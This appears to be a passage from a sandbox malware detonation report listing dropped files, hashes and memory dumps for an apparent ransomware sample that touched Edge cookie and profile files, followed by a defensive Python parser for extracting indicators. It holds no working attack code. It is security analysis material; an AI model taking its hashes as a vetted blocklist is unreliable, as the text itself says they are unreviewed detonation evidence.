memory/5392-522-0x000001A6F8630000-0x000001A6F87F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bf4fbdf5f798a4e95375def4406bc056
SHA1 735994e2b97813a66a042539e9d8cfc1cdc0953b
SHA256 9626921f63d3cc511386aef5bfefaa480cf06315129db1f4da4d9395c73858a1
SHA512 02b82447b4d16d943e2f2607a148d1e58af9fb045e09835cc802d766dacd39b0d1402538ab43335dfa56ce2a6c36c6ad195c5efc8054cf2766824df4c786d708

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

MD5 b8c462edd1a72afbef10f5c8516bb84c
SHA1 6fc9e77ffc9549d630162bf3ffaa4377b8169e50
SHA256 39dba404ec86ff61045b73716add587097bf67bee3b6da724cc4f3a6ee0f111f
SHA512 7b70c7935221881fa04ad4aae29fe2520c0fabb9b0961912b3d5d0693e6ca98dbdc8a2fc0bb08dcef240bec0282bb226ff02c8ce5823dd2a593fef1ebaf09865

C:\Users\Admin\AppData\Local\Temp\tmp27CA.tmp

MD5 14ccc9293153deacbb9a20ee8f6ff1b7
SHA1 46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3
SHA256 3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511
SHA512 916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 807728840ff468b46a3b9624461c540d
SHA1 225a1204a77df81608d37a4a0358590ada609ad7
SHA256 3d419ac12c0199eac92f33cf485942b7b2fd4cacd081d8a4bc6c1295ab81e1e8
SHA512 1d1e8d08c473b3470fe9c4c784acb7740d8f29351cbb09d610cc9c669b2315945dd3be07e1fd66af3f7cf9711c28579ecad9cc22bf2901605dbd152615073dfe

C:\Users\Admin\AppData\Local\Temp\tmp282A.tmp

MD5 87210e9e528a4ddb09c6b671937c79c6
SHA1 3c75314714619f5b55e25769e0985d497f0062f2
SHA256 eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512 f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

memory/1860-570-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1860-569-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5228-609-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5228-608-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/1428-618-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1428-617-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/1428-620-0x000001AACD8A0000-0x000001AACD8B6000-memory.dmp

memory/5176-683-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5176-684-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5864-716-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5864-715-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5916-766-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5916-767-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/460-837-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/460-838-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 008114e1a1a614b35e8a7515da0f3783
SHA1 3c390d38126c7328a8d7e4a72d5848ac9f96549b
SHA256 7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18
SHA512 a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

memory/4308-892-0x0000028CC6560000-0x0000028CC656C000-memory.dmp

C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC

MD5 c2b914d622e71b24319d75f11166b584
SHA1 746581a2292c8fdafd5665ac01b3f14d76633edd
SHA256 9e15682ed642c1c152fc5a4cab912b213dd546813982d2d70adde11b5202c5ed
SHA512 7658d847b08c5d8ca062a8a69b0ab9589f4fd554225601705f3c6672ea8fd23267e606d0e3999e125282e1179a1f064000fbc4dfa9aeb5129247b7625a6f055d

memory/4308-1107-0x0000028CC6A70000-0x0000028CC6A7C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b5571f0e979dfe4b4988b56c6cda3b0d
SHA1 88595bcd9c4936725a18d0e35b6ea5f059d7773a
SHA256 22ac81f37cf9a7e965b5692b1d772ab4b7d7d0dafadc479bac78dd94bd7cd6d9
SHA512 75d404e73bcf71dafb2b8e33fa032af8f66adddd2dea106bae3abbd5f4ffb3205d35de16e81bf1f70c8d57ba0a67963fb5474169cc9094c7403df58aa2866d3a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 34ba88c0318ca7b09d73f8b27b38711b
SHA1 801b00136cd012a853b49f016b139ad581a4fa87
SHA256 5a01daaa5be0a36b3980d07f8c0c8f319a635df5166978830c70b3d7e1c310bc
SHA512 a70b734de78fd73661def3a95139c25e140527cfd38dda134da6f8facda089ccf6ba48e526bdebf881be92846506f36c7c514353a590490165ba868d346ea8d5

memory/4308-1800-0x0000028CC6A80000-0x0000028CC6DD0000-memory.dmp

memory/4308-1801-0x0000028CC6DD0000-0x0000028CC6DDE000-memory.dmp
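The dropped-file and memory-dump entries above are the raw material for IOC extraction, and they repay a small amount of structure. Two things stand out when the listing is parsed rather than read: the ranges 0x00007FF85AEE0000-0x00007FF85B0E9000 and 0x00007FF85A750000-0x00007FF85A80D000 recur in process 3732, 4612, 5392, 5576, 5704, 1860, 5228, 1428, 5176, 5864, 5916 and 460, which is what system DLLs mapped at one per-boot base look like, not a per-process payload, so the regions worth pulling for analysis are the ones unique to a PID; and the `.ENC` suffix on the copied NTUSER.DAT transaction log is consistent with the ransomware tag on this sample. The parser below is an added example written for this page, not tooling from the sandbox that produced the report. It reads the listing format as shown (a path line followed by `MD5`/`SHA1`/`SHA256`/`SHA512` lines, and `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` lines), validates digest lengths, separates shared mappings from private regions, and picks out renamed files by suffix. The embedded sample is an excerpt copied from the entries above; the `<path not in excerpt>` placeholder and the `.ENC` default are this example's own choices.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Expected hex-digest lengths; a digest of the wrong length is a parse error, not an IOC.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)


@dataclass
class MemRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_report(text: str):
    """Split a sandbox file listing into dropped-file records and memory regions."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            regions.append(MemRegion(int(m["pid"]), int(m["seq"]),
                                     int(m["start"], 16), int(m["end"], 16)))
            current = None          # a dump line ends the preceding file entry
            continue
        h = HASH_RE.match(line)
        if h:
            algo, digest = h.group(1), h.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has length {len(digest)} for {current}")
            if current is None:
                # hashes whose path line fell outside the excerpt (placeholder is ours)
                current = DroppedFile(path="<path not in excerpt>")
                files.append(current)
            current.hashes[algo] = digest
            continue
        current = DroppedFile(path=line)   # any other non-empty line starts a new entry
        files.append(current)
    return files, regions


def shared_regions(regions, min_pids: int = 2):
    """Ranges that appear in several PIDs: mappings shared across processes, not injected payload."""
    by_range = defaultdict(set)
    for r in regions:
        by_range[(r.start, r.end)].add(r.pid)
    return {rng: sorted(pids) for rng, pids in by_range.items() if len(pids) >= min_pids}


def private_regions(regions):
    """Regions seen in exactly one PID; these are the dumps worth carving first."""
    shared = shared_regions(regions)
    return [r for r in regions if (r.start, r.end) not in shared]


def files_with_suffix(files, suffix: str = ".ENC"):
    """Files carrying an appended extension, e.g. the ransomware-renamed NTUSER.DAT log above."""
    return [f for f in files if f.path.upper().endswith(suffix.upper())]


def hash_set(files, algo: str = "SHA256"):
    """Deduplicated digest list for blocklist or threat-intel lookup."""
    return sorted({f.hashes[algo] for f in files if algo in f.hashes})


# Constructed excerpt: copied from the listing on this page, trimmed to a few entries.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\Lion.bat

MD5 54f4209e9822dcbb808ce58ad71bb220
SHA1 bf69591a55b153acfe2f95de88240515dacb12c1
SHA256 3b435337d04e078702eff4d242a4c4a5c7580dfdcae6fd78469b02fa51d75f2b
SHA512 b5df846cec5b2802358e9718f6fa4fb38735c7f12677381cafc8c461bfa93b8685e58e179ef062a600fa8b74acd1e102068a8b921cbb2293ef70d996531d31c9

memory/3732-390-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/3732-392-0x000002496F040000-0x000002496F0C4000-memory.dmp
memory/4612-407-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/4612-409-0x000002BFE9DA0000-0x000002BFE9DEE000-memory.dmp

C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC

MD5 c2b914d622e71b24319d75f11166b584
SHA1 746581a2292c8fdafd5665ac01b3f14d76633edd
SHA256 9e15682ed642c1c152fc5a4cab912b213dd546813982d2d70adde11b5202c5ed
SHA512 7658d847b08c5d8ca062a8a69b0ab9589f4fd554225601705f3c6672ea8fd23267e606d0e3999e125282e1179a1f064000fbc4dfa9aeb5129247b7625a6f055d
"""

if __name__ == "__main__":
    files, regions = parse_report(SAMPLE)
    for rng, pids in shared_regions(regions).items():
        print(f"shared 0x{rng[0]:016X}-0x{rng[1]:016X} in PIDs {pids}")
    for r in private_regions(regions):
        print(f"private pid={r.pid} 0x{r.start:016X} size=0x{r.size:X}")
    for f in files_with_suffix(files):
        print("renamed:", f.path)
    print("sha256:", *hash_set(files), sep="\n  ")
```

Run against the full listing rather than the excerpt and the shared-range dictionary collapses the dozens of repeated 0x7FF85AEE0000 and 0x7FF85A750000 dumps into two entries, leaving the per-PID heap-range dumps (for example the 0x000001A6F... regions of PID 5392 and the 0x0000028CC... regions of PID 4308) as the candidates to open first. Hashes of browser profile files such as `Local State` and `Cookies` appear in the listing because the sample touched them, so treat `hash_set()` output as observed-in-detonation evidence, not as a malware blocklist, until each path has been reviewed.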